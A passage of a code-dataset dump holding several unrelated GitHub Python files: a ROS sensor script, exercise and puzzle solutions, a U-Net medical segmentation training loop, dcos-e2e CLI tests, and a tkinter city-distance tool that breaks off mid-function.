rospy.Publisher('car_state', String, queue_size=1) #topic name\narray = [0,0,0] # right/left/below\n#array_2 = [0,0,0] # near/ far away/ find\nlight_value = 0\n\ndef collision():\n rospy.sleep(0.3)\n r = rospy.Rate(1) # 1hz\n print(array,light_value)\n while not rospy.is_shutdown():\n array[0] = touch_sensor_right()\n array[1] = touch_sensor_left ()\n array[2] = touch_sensor_below()\n pub_touch_sensor.publish(data= array)\n pub_light.publish (data= light_value)\n print('right/ left/ below:', pi.read(touch_r_pin),'/', pi.read(touch_l_pin),'/',pi.read(touch_b_pin))\n print('light_a:', pi.read(light_pin_a))\n print('light:_d', pi.read(light_pin_d))\n r.sleep()\n\n\ndef touch_sensor_right():\n if(((rospy.get_rostime()- last_time_right) > rospy.Duration(0.3,0)) & (pi.read(touch_r_pin)==0)):\n last_time_right=rospy.get_rostime()\n return 1\n else:\n return 0\n\ndef touch_sensor_left():\n if(((rospy.get_rostime()- last_time_left) > rospy.Duration(0.3,0)) & (pi.read(touch_l_pin)== 0)):\n last_time_left=rospy.get_rostime()\n return 1\n else:\n return 0\n\ndef touch_sensor_below(): \n if(((rospy.get_rostime()- last_time_below) > rospy.Duration(0.3,0)) & (pi.read(touch_b_pin)== 0)):\n last_time_below=rospy.get_rostime()\n return 1\n else:\n return 0\n\ndef light_sensor(): \n # lower value when closer \n #toward the light\n #if ((pi.read(light_pin_a)-last_light_a) < 0.0):\n # array_2 = [1, 0, 0] # near/ far away/ find\n #far away the light\n #if ((pi.read(light_pin_a)-last_light_a) > 0.0):\n # array_2[1] = [0,1,0] # near/ far away/ find\n #find the light\n #if ((((pi.read(light_pin_d) == 0) & (pi.read(last_light_d) == 0)) ==1) | (pi.read(light_pin_a)<40)):\n # array_2[2] = [0,0,1] # near/ far away/ find\n if ((pi.read(light_pin_d) == 0) & (pi.read(last_light_d) == 0)):\n light_value = 1 # near/ far away/ find\n else:\n last_light_d = pi.read(light_pin_d)\n #last_light_a = pi.read(light_pin_a)\n return light_value\n\n\nif __name__ == '__main__':\n #data = String (input('Type q to exit:'))\n #if( data == 'q' ):\n # os._exit(0)\n #else:\n # data == 'g' \n # pub_state(data)\n try:\n collision()\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n\n","repo_name":"yutingk/mobile_robot_project","sub_path":"src/cp3/src/cp3_new.py","file_name":"cp3_new.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2580881006","text":"import unittest\nimport random\n\nclass Node():\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\nclass Tree(object):\n def __init__(self, root=None):\n self.root = root\n\n\n def in_order(self):\n return self.in_order_recur(self.root)\n\n def in_order_recur(self, node):\n if node:\n for val in self.in_order_recur(node.left):\n yield val\n yield node.value\n for val in self.in_order_recur(node.right):\n yield val\n\n def bst_from_arr(self, arr):\n n = len(arr)\n if n == 1:\n return Node(arr[0])\n if n == 0:\n return None\n\n mid = n // 2\n node = Node(arr[mid])\n left_half = arr[:mid]\n right_half = arr[mid + 1:]\n\n node.left = self.bst_from_arr(left_half)\n node.right = self.bst_from_arr(right_half)\n return node\n\nclass TestTree(unittest.TestCase):\n def setUp(self):\n self.arr = []\n while len(self.arr) != 20:\n num = random.randint(1, 100)\n if num not in self.arr:\n self.arr.append(num)\n\n self.T = Tree()\n self.T.root = self.T.bst_from_arr(self.arr)\n\n\n def test_tree(self):\n res = list(self.T.in_order())\n self.assertEqual(res, self.arr)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"KaluEmeKalu/cracking_the_coding_interview_python_solutions","sub_path":"ch4_graphes_and_trees/q2_binary_search_tree_from_array.py","file_name":"q2_binary_search_tree_from_array.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39369076214","text":"from torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom progressBar import printProgressBar\nimport medicalDataLoader\nfrom UNet import *\nfrom utils import *\n\nimport time\n\nfrom optimizer import Adam\n\ndef weights_init(m):\n if type(m) == nn.Conv2d or type(m) == nn.ConvTranspose2d:\n nn.init.xavier_normal(m.weight.data)\n elif type(m) == nn.BatchNorm2d:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef fill_up_weights(up):\n w = up.weight.data\n f = math.ceil(w.size(2) / 2)\n c = (2 * f - 1 - f % 2) / (2. * f)\n for i in range(w.size(2)):\n for j in range(w.size(3)):\n w[0, 0, i, j] = \\\n (1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))\n for c in range(1, w.size(0)):\n w[c, 0, :, :] = w[0, 0, :, :]\n \n\n \ndef resizeTensorMaskInSingleImage(batch, scalingFactor):\n data = batch.cpu().data.numpy()\n batch_s = data.shape[0]\n numClasses = data.shape[1]\n img_size = data.shape[2]\n # TODO: Better way to define this\n resizedLabels = np.zeros((batch_s,\n int(img_size/scalingFactor),\n int(img_size/scalingFactor)))\n \n \n for i in range(data.shape[0]):\n img = data[i,:,:].reshape(img_size,img_size)\n imgL = np.zeros((img_size,img_size))\n idx1t = np.where(img==1)\n imgL[idx1t]=1\n imgRes = skiTransf.resize(imgL,(img_size/scalingFactor,img_size/scalingFactor),preserve_range=True)\n idx1 = np.where(imgRes>=0.5)\n \n imgL = np.zeros((img_size,img_size))\n idx2t = np.where(img==1)\n imgL[idx2t]=1\n imgRes = skiTransf.resize(imgL,(img_size/scalingFactor,img_size/scalingFactor),preserve_range=True)\n idx2 = np.where(imgRes>=0.5)\n \n imgL = np.zeros((img_size,img_size))\n idx3t = np.where(img==1)\n imgL[idx3t]=1\n imgRes = skiTransf.resize(imgL,(img_size/scalingFactor,img_size/scalingFactor),preserve_range=True)\n idx3 = np.where(imgRes>=0.5)\n \n imgResized = np.zeros((int(img_size/scalingFactor),int(img_size/scalingFactor)))\n imgResized[idx1]=1\n imgResized[idx2]=2\n imgResized[idx3]=3\n \n \n resizedLabels[i,:,:]=imgResized\n \n tensorClass = torch.from_numpy(resizedLabels).long()\n return Variable(tensorClass.cuda())\n \ndef runTraining():\n print('-' * 40)\n print('~~~~~~~~ Starting the training... ~~~~~~')\n print('-' * 40)\n\n batch_size = 4\n batch_size_val = 1\n batch_size_val_save = 1\n batch_size_val_savePng = 4\n lr = 0.0001\n epoch = 1000\n root_dir = '../DataSet/Bladder_Aug'\n modelName = 'UNetG_Dilated_Progressive'\n model_dir = 'model'\n\n transform = transforms.Compose([\n transforms.ToTensor()\n ])\n\n mask_transform = transforms.Compose([\n transforms.ToTensor()\n ])\n\n train_set = medicalDataLoader.MedicalImageDataset('train',\n root_dir,\n transform=transform,\n mask_transform=mask_transform,\n augment=False,\n equalize=False)\n\n train_loader = DataLoader(train_set,\n batch_size=batch_size,\n num_workers=5,\n shuffle=True)\n\n val_set = medicalDataLoader.MedicalImageDataset('val',\n root_dir,\n transform=transform,\n mask_transform=mask_transform,\n equalize=False)\n\n val_loader = DataLoader(val_set,\n batch_size=batch_size_val,\n num_workers=5,\n shuffle=False)\n \n val_loader_save_images = DataLoader(val_set,\n batch_size=batch_size_val_save,\n num_workers=5,\n shuffle=False)\n\n val_loader_save_imagesPng = DataLoader(val_set,\n batch_size=batch_size_val_savePng,\n num_workers=5,\n shuffle=False) \n # Initialize\n print(\"~~~~~~~~~~~ Creating the model ~~~~~~~~~~\")\n num_classes = 4\n \n initial_kernels = 32\n \n # Load network\n netG = UNetG_Dilated_Progressive(1, initial_kernels, num_classes)\n softMax = nn.Softmax()\n CE_loss = nn.CrossEntropyLoss()\n Dice_loss = computeDiceOneHot()\n \n if torch.cuda.is_available():\n netG.cuda()\n softMax.cuda()\n CE_loss.cuda()\n Dice_loss.cuda()\n\n '''try:\n netG = torch.load('./model/Best_UNetG_Dilated_Progressive_Stride_Residual_ChannelsFirst32.pkl')\n print(\"--------model restored--------\")\n except:\n print(\"--------model not restored--------\")\n pass'''\n \n optimizerG = Adam(netG.parameters(), lr=lr, betas=(0.9, 0.99), amsgrad=False)\n \n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizerG, mode='max', patience=4, verbose=True,\n factor=10 ** -0.5)\n \n BestDice, BestEpoch = 0, 0\n\n d1Train = []\n d2Train = []\n d3Train = []\n d1Val = []\n d2Val = []\n d3Val = []\n \n Losses = []\n Losses1 = []\n Losses05 = []\n Losses025 = []\n Losses0125 = []\n\n print(\"~~~~~~~~~~~ Starting the training ~~~~~~~~~~\")\n for i in range(epoch):\n netG.train()\n lossVal = []\n lossValD = []\n lossVal1 = []\n lossVal05 = []\n lossVal025 = []\n lossVal0125 = []\n \n d1TrainTemp = []\n d2TrainTemp = []\n d3TrainTemp = []\n \n timesAll = []\n success = 0\n totalImages = len(train_loader)\n \n for j, data in enumerate(train_loader):\n image, labels, img_names = data\n\n # prevent batchnorm error for batch of size 1\n if image.size(0) != batch_size:\n continue\n\n optimizerG.zero_grad()\n MRI = to_var(image)\n Segmentation = to_var(labels)\n \n target_dice = to_var(torch.ones(1))\n \n ################### Train ###################\n netG.zero_grad()\n\n deepSupervision = False\n multiTask = False\n \n start_time = time.time()\n if deepSupervision == False and multiTask == False:\n # No deep supervision\n segmentation_prediction = netG(MRI)\n else:\n # Deep supervision\n if deepSupervision == True:\n segmentation_prediction, seg_3, seg_2, seg_1 = netG(MRI)\n else:\n segmentation_prediction,reg_output = netG(MRI)\n # Regression\n feats = getValuesRegression(labels)\n \n feats_t = torch.from_numpy(feats).float()\n featsVar = to_var(feats_t)\n \n MSE_loss_val = MSE_loss(reg_output,featsVar)\n \n predClass_y = softMax(segmentation_prediction)\n \n spentTime = time.time()-start_time\n \n timesAll.append(spentTime/batch_size) \n \n Segmentation_planes = getOneHotSegmentation(Segmentation)\n segmentation_prediction_ones = predToSegmentation(predClass_y)\n\n # It needs the logits, not the softmax\n Segmentation_class = getTargetSegmentation(Segmentation)\n\n # No deep supervision\n CE_lossG = CE_loss(segmentation_prediction, Segmentation_class)\n if deepSupervision == True:\n \n imageLabels_05 = resizeTensorMaskInSingleImage(Segmentation_class, 2)\n imageLabels_025 = resizeTensorMaskInSingleImage(Segmentation_class, 4)\n imageLabels_0125 = resizeTensorMaskInSingleImage(Segmentation_class, 8)\n \n CE_lossG_3 = CE_loss(seg_3, imageLabels_05)\n CE_lossG_2 = CE_loss(seg_2, imageLabels_025)\n CE_lossG_1 = CE_loss(seg_1, imageLabels_0125)\n \n '''weight = torch.ones(4).cuda() # Num classes\n weight[0] = 0.2\n weight[1] = 0.2\n weight[2] = 1\n weight[3] = 1\n \n CE_loss.weight = weight'''\n\n # Dice loss\n DicesN, DicesB, DicesW, DicesT = Dice_loss(segmentation_prediction_ones, Segmentation_planes)\n DiceN = DicesToDice(DicesN)\n DiceB = DicesToDice(DicesB)\n DiceW = DicesToDice(DicesW)\n DiceT = DicesToDice(DicesT)\n\n Dice_score = (DiceB + DiceW + DiceT) / 3\n \n if deepSupervision == False and multiTask == False:\n lossG = CE_lossG \n else:\n # Deep supervision\n if deepSupervision == True:\n lossG = CE_lossG + 0.25*CE_lossG_3 + 0.1*CE_lossG_2 + 0.1*CE_lossG_1\n else:\n lossG = CE_lossG + 0.000001*MSE_loss_val\n \n \n lossG.backward()\n optimizerG.step()\n \n lossVal.append(lossG.data[0])\n lossVal1.append(CE_lossG.data[0])\n \n if deepSupervision == True:\n lossVal05.append(CE_lossG_3.data[0])\n lossVal025.append(CE_lossG_2.data[0])\n lossVal0125.append(CE_lossG_1.data[0])\n\n printProgressBar(j + 1, totalImages,\n prefix=\"[Training] Epoch: {} \".format(i),\n length=15,\n suffix=\" Mean Dice: {:.4f}, Dice1: {:.4f} , Dice2: {:.4f}, , Dice3: {:.4f} \".format(\n Dice_score.data[0],\n DiceB.data[0],\n DiceW.data[0],\n DiceT.data[0]))\n\n if deepSupervision == False:\n '''printProgressBar(totalImages, totalImages,\n done=\"[Training] Epoch: {}, LossG: {:.4f},\".format(i,np.mean(lossVal),np.mean(lossVal1)))'''\n printProgressBar(totalImages, totalImages,\n done=\"[Training] Epoch: {}, LossG: {:.4f}, lossMSE: {:.4f}\".format(i,np.mean(lossVal),np.mean(lossVal1)))\n else:\n printProgressBar(totalImages, totalImages,\n done=\"[Training] Epoch: {}, LossG: {:.4f}, Loss4: {:.4f}, Loss3: {:.4f}, Loss2: {:.4f}, Loss1: {:.4f}\".format(i,\n np.mean(lossVal),\n np.mean(lossVal1),\n np.mean(lossVal05),\n np.mean(lossVal025),\n np.mean(lossVal0125)))\n\n Losses.append(np.mean(lossVal))\n\n d1,d2,d3 = inference(netG, val_loader, batch_size, i, deepSupervision)\n \n d1Val.append(d1)\n d2Val.append(d2)\n d3Val.append(d3)\n\n d1Train.append(np.mean(d1TrainTemp).data[0])\n d2Train.append(np.mean(d2TrainTemp).data[0])\n d3Train.append(np.mean(d3TrainTemp).data[0])\n\n mainPath = '../Results/Statistics/' + modelName\n \n directory = mainPath\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n ###### Save statistics ######\n np.save(os.path.join(directory, 'Losses.npy'), Losses)\n \n np.save(os.path.join(directory, 'd1Val.npy'), d1Val)\n np.save(os.path.join(directory, 'd2Val.npy'), d2Val)\n np.save(os.path.join(directory, 'd3Val.npy'), d3Val)\n\n np.save(os.path.join(directory, 'd1Train.npy'), d1Train)\n np.save(os.path.join(directory, 'd2Train.npy'), d2Train)\n np.save(os.path.join(directory, 'd3Train.npy'), d3Train)\n\n currentDice = (d1+d2+d3)/3 \n\n # How many slices with/without tumor correctly classified\n print(\"[val] DSC: (1): {:.4f} (2): {:.4f} (3): {:.4f} \".format(d1,d2,d3))\n \n if currentDice > BestDice:\n BestDice = currentDice\n BestDiceT = d1\n BestEpoch = i\n if currentDice > 0.7:\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Saving best model..... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n torch.save(netG, os.path.join(model_dir, \"Best_\" + modelName + \".pkl\"))\n\n # Save images\n saveImages(netG, val_loader_save_images, batch_size_val_save, i, modelName, deepSupervision)\n saveImagesAsMatlab(netG, val_loader_save_images, batch_size_val_save, i, modelName, deepSupervision)\n\n print(\"### ###\")\n print(\"### Best Dice: {:.4f} at epoch {} with DiceT: {:.4f} ###\".format(BestDice, BestEpoch, BestDiceT))\n print(\"### ###\")\n\n # This is not as we did it in the MedPhys paper\n if i % (BestEpoch + 20):\n for param_group in optimizerG.param_groups:\n param_group['lr'] = lr/2\n\n\nif __name__ == '__main__':\n runTraining()\n","repo_name":"josedolz/Progressive_Dilated_UNet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9364243315","text":"import csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntemp = []\nprecip_b = []\nprecip_w = []\nyear = []\n\nwith open('hugh_data.csv', 'r') as csvfile:\n reader = csv.reader(csvfile,)\n next(reader, None)\n for row in reader:\n try:\n year.append(float(row[0]))\n except(ValueError):\n year.append(None)\n try:\n precip_b.append(float(row[1]))\n except(ValueError):\n precip_b.append(None)\n try:\n precip_w.append(float(row[2]))\n except(ValueError):\n precip_w.append(None)\n try:\n temp.append(float(row[3]))\n except(ValueError):\n temp.append(None)\n\n\nfig, ax1 = plt.subplots()\n\nax1.plot(year, precip_b, 'b-')\nax1.set_xlabel('Year')\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel('Precip Bunton', color='b')\nax1.tick_params('y', colors='b')\n\nax2 = ax1.twinx()\nax2.plot(year, temp, 'r.')\nax2.set_ylabel('Temperature Fluctuation', color='r')\nax2.tick_params('y', colors='r')\n\nfig.tight_layout()\nplt.show()\n","repo_name":"gkelly900/hugh","sub_path":"hugh.py","file_name":"hugh.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3897762437","text":"#!/usr/bin/env python3\nimport pytest\nimport parse\nimport flatdict\nfrom pprint import pprint\n\nINPUT = 'day7/test_input.txt'\n# INPUT = 'day7/example.txt'\n\ndef main():\n\n input_file = open(INPUT, 'r')\n Lines = input_file.readlines()\n \n import collections\n # print([item for item, count in collections.Counter(Lines).items() if count > 1])\n # dirs = parse_dirs(Lines, '/', 0)\n dirs = parse_dirs_new(Lines)\n print (dirs)\n dirs = dirs.reset_head()\n print (dirs)\n list = dirs.flatten()\n print (list)\n free_space(list)\n # total_sizes(list)\n \ndef total_sizes(list):\n total = 0\n list.sort()\n for size in list:\n if (size <= 100000):\n total += size\n print (f\"Puzzle anser is {total}\")\n \ndef free_space(list):\n disk_size = 70000000\n print(f\"Disk size = {disk_size}\")\n list.sort()\n space_used = list.pop()\n print(f\"Space used = {space_used}\")\n space_left = disk_size - space_used\n print(f\"Space left = {space_left}\")\n\n needed_space = 30000000\n print(f\"Update space needed = {needed_space}\")\n\n needed_space -= space_left\n print(f\"Update space 2free = {needed_space}\")\n \n \n\n print (list)\n for size in list:\n if size > needed_space:\n print (size)\n break\n 2143088\n 2042410\n \ndef flatten_sizes(Dirs):\n size_list = []\n if type(Dirs) is dict:\n for key in Dirs:\n if key == \"size\":\n print (Dirs[\"size\"])\n size_list.append(int(Dirs[\"size\"]))\n else:\n size_list.extend(flatten_sizes(Dirs[key]))\n else:\n if (len(Dirs) > 0):\n for item in Dirs:\n size_list.extend(flatten_sizes(item))\n return size_list\n\ndef parse_dirs(Lines, start_dir, idx):\n dirs = []\n log = False\n size = 0\n for i in range (idx, len(Lines)):\n line = Lines[i].strip()\n if (line.startswith(\"$ cd \" + start_dir)):\n for j in range (i+2, len(Lines)):\n newline = Lines[j].strip()\n if (newline.startswith(\"$ \")):\n break\n if (newline.startswith(\"dir \")):\n new_dir = parse_dirs(Lines, newline.split(\" \")[1], j)\n dirs.append(new_dir)\n size += new_dir[\"size\"]\n else:\n size += int(newline.split(\" \")[0])\n break\n return {start_dir: dirs, \"size\": size}\n\nclass Directory():\n def __init__(self, parent, name):\n self.name = name\n self.parent = parent\n self.files = {}\n self.size = 0\n if self.parent == None:\n self.parent = self\n \n def reset_head(self):\n while self.name != \"/\":\n self = self.get_parent()\n print (self)\n return self\n\n def flatten(self):\n size_arr = [self.size]\n for filename in self.files:\n size_arr.extend(self.files[filename].flatten())\n return size_arr\n\n def __str__(self):\n string = self.name\n return string\n \n def add_dir(self, Name):\n self.files[Name] = Directory(self,Name)\n \n def add_file(self, size):\n self.size += size\n if self.name != '/':\n self.parent.add_file(size)\n\n def get_child(self, Name):\n if Name in self.files:\n return self.files[Name]\n else:\n print (f\"WARN {Name} not in filesystem\")\n return self\n \n def get_parent(self):\n return self.parent\n\ndef parse_dirs_new(Lines):\n head = Directory(None, \"/\")\n dpth = -1\n for line in Lines:\n line = line.strip()\n if (line.startswith(\"$ cd ..\")):\n head = head.get_parent()\n dpth -= 1\n elif (line.startswith(\"$ cd\")):\n dpth +=1\n dirnm = line.split(\" \")[2]\n head = head.get_child(dirnm)\n elif (line.startswith(\"$ ls\")):\n continue\n elif (line.startswith(\"dir \")):\n dirnm = line.split(\" \")[1]\n head.add_dir(dirnm)\n continue\n else:\n size = line.split(\" \")[0]\n head.add_file(int(size))\n print ((dpth+1)*\" \" + line)\n return head\n \n\nif __name__ == '__main__':\n main()\n \n\n\n\n### PYTEST ###\n\ndef test_process():\n assert True\n # assert process(\"bvwbjplbgvbhsrlpgdmjqwftvncz\") == 5\n # assert process(\"nppdvjthqldpwncqszvftbrmjlhg\") == 6\n # assert process(\"nznrnfrfntjfmvfwmzdfjlvtqnbhcprsg\") == 10\n # assert process(\"zcfzfwzzqfrljwzlrfnpqdbhtmscgvjw\") == 11\n\n","repo_name":"tjsander/advent2022","sub_path":"day7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26506749761","text":"from ast import List\n\n\nclass solution:\n def maxAreaBruteForce(self, height: List[int]) -> int:\n res = 0 # define the result\n\n for l in range(len(height)):\n for r in range(l+1, len(height)):\n area = (r -l) * min(height[l], height[r]) # use bottleneck to find height\n res = max(res, area)\n return res \n\n def maxAreaLinear(self, height: List[int]) -> int:\n res = 0\n l, r = 0, len(height) -1\n\n while l < r:\n area = (r -l) * min(height[l], height[r]) # use bottleneck to find height\n res = max(res, area)\n\n if height[l] < height[r]:\n l += 1\n elif height[r] < height[l]:\n r -= 1\n else: #if equal\n r -= 1 \n return res","repo_name":"RebeccaSchmelzer/Practice","sub_path":"Leetcode/blind-75/container-water.py","file_name":"container-water.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20737834941","text":"# 문제\n# 땅 위에 달팽이가 있다. 이 달팽이는 높이가 V미터인 나무 막대를 올라갈 것이다.\n\n# 달팽이는 낮에 A미터 올라갈 수 있다. 하지만, 밤에 잠을 자는 동안 B미터 미끄러진다. 또, 정상에 올라간 후에는 미끄러지지 않는다.\n\n# 달팽이가 나무 막대를 모두 올라가려면, 며칠이 걸리는지 구하는 프로그램을 작성하시오.\n\n# 입력\n# 첫째 줄에 세 정수 A, B, V가 공백으로 구분되어서 주어진다. (1 ≤ B < A ≤ V ≤ 1,000,000,000)\n\n# 출력\n# 첫째 줄에 달팽이가 나무 막대를 모두 올라가는데 며칠이 걸리는지 출력한다.\n\n# 예제 입력 \n# 2 1 5\n# 예제 출력\n# 4\n\n\n\n# A,B,V = map(int, input().split())\n\n# cnt = 0 #며칠이 걸리는지\n# high = 0 #달팽이 높이\n\n# while True:\n# cnt += 1\n# high += A\n# if high >= V:\n# print(cnt)\n# break\n# high -= B\n\n\n# 달팽이 하루 이동거리는 (낮이동 - 밤이동)\n# 정상에 도착하면 미끄러지지 않으니까 올라갈 높이는 (나무높이 - 밤이동)\n# 나무높이 = (낮이동 - 밤이동) * (day-1) + 낮이동 \n\n# (나무높이 - 밤이동) = (낮이동 - 밤이동) * day\n\n\nfrom math import *\nA,B,V = map(int, input().split())\n\nday = (V - B) / (A - B)\n\nprint(ceil(day))","repo_name":"gestirn717/Practice","sub_path":"math1/test_2869_math.py","file_name":"test_2869_math.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1661614009","text":"\"\"\"\nTests for the Vagrant CLI.\n\nThis mostly provides error case coverage.\nWe rely mostly on manual testing.\nThis is because automated tests for this would be very slow.\n\"\"\"\n\nimport os\nfrom pathlib import Path\nfrom typing import List\n\nimport pytest\nfrom click.testing import CliRunner\n\nfrom dcos_e2e_cli import dcos_vagrant, minidcos\n\n_SUBCOMMANDS = [[item] for item in dcos_vagrant.commands.keys()]\n_BASE_COMMAND = [[]] # type: List[List[str]]\n_COMMANDS = _BASE_COMMAND + _SUBCOMMANDS\n\n\nclass TestHelp:\n \"\"\"\n Test help texts.\n \"\"\"\n\n @pytest.mark.parametrize(\n 'command',\n _COMMANDS,\n ids=[str(cmd) for cmd in _COMMANDS],\n )\n def test_help(self, command: List[str]) -> None:\n \"\"\"\n Expected help text is shown for ``minidcos vagrant`` commands.\n\n This help text is defined in files.\n To update these files, run the command\n ``bash admin/update_cli_tests.sh``.\n \"\"\"\n runner = CliRunner()\n arguments = ['vagrant'] + command + ['--help']\n result = runner.invoke(minidcos, arguments, catch_exceptions=False)\n assert result.exit_code == 0\n help_output_filename = '-'.join(['dcos-vagrant'] + command) + '.txt'\n help_outputs_dir = Path(__file__).parent / 'help_outputs'\n expected_help_file = help_outputs_dir / help_output_filename\n try:\n expected_help = expected_help_file.read_text()\n assert result.output == expected_help\n except (AssertionError, FileNotFoundError): # pragma: no cover\n if os.getenv('FIX_CLI_TESTS') == '1':\n help_outputs_dir.mkdir(exist_ok=True)\n expected_help_file.touch()\n expected_help_file.write_text(result.output)\n else:\n raise\n\n\nclass TestDoctor:\n \"\"\"\n Tests for the ``doctor`` subcommand.\n \"\"\"\n\n @pytest.mark.skipif(\n os.environ.get('TRAVIS') == 'true',\n reason='It is not possible to run VirtualBox on Travis CI',\n )\n @pytest.mark.skipif(\n os.environ.get('GITHUB_ACTIONS') == 'true',\n reason='It is not possible to run VirtualBox on GitHub Actions',\n )\n def test_doctor(self) -> None: # pragma: no cover\n \"\"\"\n No exception is raised by the ``doctor`` subcommand.\n \"\"\"\n runner = CliRunner()\n result = runner.invoke(\n minidcos,\n ['vagrant', 'doctor'],\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n","repo_name":"dcos/dcos-e2e","sub_path":"tests/test_cli/test_dcos_vagrant/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"2563369103","text":"from itertools import permutations\n\ndef solution(numbers):\n answer = 0\n \n for i in range(1, len(numbers) + 1):\n num_list = list(set(permutations(numbers, i))) # set 자료구조를 이용하여 중복 제거\n for num in num_list:\n if num[0] != \"0\": # 첫번째 수가 0이 아닐 경우\n num = int(\"\".join(num)) # 합쳐준 후, 숫자형으로 변환\n if isPrimeNumber(num): # 소수일 경우\n answer += 1\n\n return answer\n\ndef isPrimeNumber(num):\n if num <= 1:\n return False\n \n for i in range(2, int(num ** 0.5) + 1):\n if num % i == 0:\n return False\n \n return True","repo_name":"2do1/Algorithm","sub_path":"Programmers/Level2/소수 찾기/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21067666753","text":"# we can use the idea of bisection search to determine if a character is in a string, so long as the string is sorted in alphabetical order.\n# Implement the function isIn(char, aStr) which implements the above idea recursively to test if char is in aStr.\n# char will be a single character and aStr will be a string that is in alphabetical order.\n# The function should return a boolean value.\n\ndef isIn(char, aStr):\n '''\n char: a single character\n aStr: an alphabetized string\n \n returns: True if char is in aStr; False otherwise\n '''\n # Your code here\n char = char.lower()\n aStr = aStr.lower()\n index = int(len(aStr) / 2)\n if aStr == '':\n return False\n elif index == 0:\n return char == aStr[0]\n elif char < aStr[index]:\n aStr = aStr[0:index]\n return isIn(char, aStr)\n else:\n aStr = aStr[index:]\n return isIn(char, aStr)\n","repo_name":"hugojing/mitx-6.00.1x","sub_path":"week-2-exercise/is-in.py","file_name":"is-in.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36391561008","text":"import tkinter as tk\n\nfrom geopy.distance import geodesic\n\nfrom src.utils.add_city import add_city as add_city_back\n\n\ndef add_city_window():\n \"\"\"\n Créer la fenêtre de création d'une ville.\n \"\"\"\n root = tk.Toplevel()\n root.wm_title(\"Window\")\n\n # Champ d'entrée du nom de la ville\n city_label = tk.Label(root, text=\"Nom de la ville\")\n city_label.grid(row=0, column=0)\n city_entry = tk.Entry(root)\n city_entry.grid(row=0, column=1)\n\n # Champ d'entrée de la latitude\n latitude_label1 = tk.Label(root, text=\"Latitude\")\n latitude_label1.grid(row=1, column=0)\n latitude_entry = tk.Entry(root)\n latitude_entry.grid(row=1, column=1)\n latitude_label2 = tk.Label(root, text=\"°\")\n latitude_label2.grid(row=1, column=2)\n latitude_entry2 = tk.Entry(root)\n latitude_entry2.grid(row=1, column=3)\n latitude_label3 = tk.Label(root, text=\"'N\")\n latitude_label3.grid(row=1, column=4)\n\n # Champ d'entrée de la longitude\n longitude_label = tk.Label(root, text=\"Longitude\")\n longitude_label.grid(row=2, column=0)\n longitude_entry = tk.Entry(root)\n longitude_entry.grid(row=2, column=1)\n longitude_label2 = tk.Label(root, text=\"°\")\n longitude_label2.grid(row=2, column=2)\n longitude_entry2 = tk.Entry(root)\n longitude_entry2.grid(row=2, column=3)\n\n # Options du dropdown de sélection de la direction\n options = [\"W\", \"E\"]\n\n selected_direction = tk.StringVar()\n selected_direction.set(options[0])\n\n # Champ d'entrée de la direction des coordonées\n drop = tk.OptionMenu(root, selected_direction, *options)\n drop.grid(row=2, column=4)\n\n def on_save():\n \"\"\"\n Fonction de sauvegarde des données entrée dans le formulaire.\n \"\"\"\n lat = f\"{latitude_entry.get()}° {latitude_entry2.get()}'N\"\n lng = f\"{longitude_entry.get()}° {longitude_entry2.get()}'{selected_direction}\"\n\n add_city_back(city_entry.get(), lat, lng)\n\n # Bouton de sauvegarde\n save = tk.Button(root, text=\"Sauvegarder\", command=on_save)\n save.grid(row=4, column=0)\n\n # Exit button\n b = tk.Button(root, text=\"Quitter\", command=root.destroy)\n b.grid(row=4, column=1)\n\n\ndef calc_dist_window(cities):\n \"\"\"\n Créer la fenêtre de calcul de distance entre deux villes.\n\n :param cities: La liste des villes disponibles (dictionnaires avec lat et lng en propriétés)\n \"\"\"\n cities_name = list(cities)\n\n root = tk.Toplevel()\n root.wm_title('Calcul de la distance')\n\n city1_var = tk.StringVar()\n city1_dropdown = tk.OptionMenu(root, city1_var, *cities_name)\n city1_dropdown.pack()\n\n city2_var = tk.StringVar()\n city2_dropdown = tk.OptionMenu(root, city2_var, *cities_name)\n city2_dropdown.pack()\n\n label = tk.Label(root, text=\"\")\n label.pack()\n\n def on_city_update(_, __, ___):\n \"\"\"\n Fonction d'écoute de l'événement de mise à jour d'un dropdown.\n \"\"\"\n city1 = 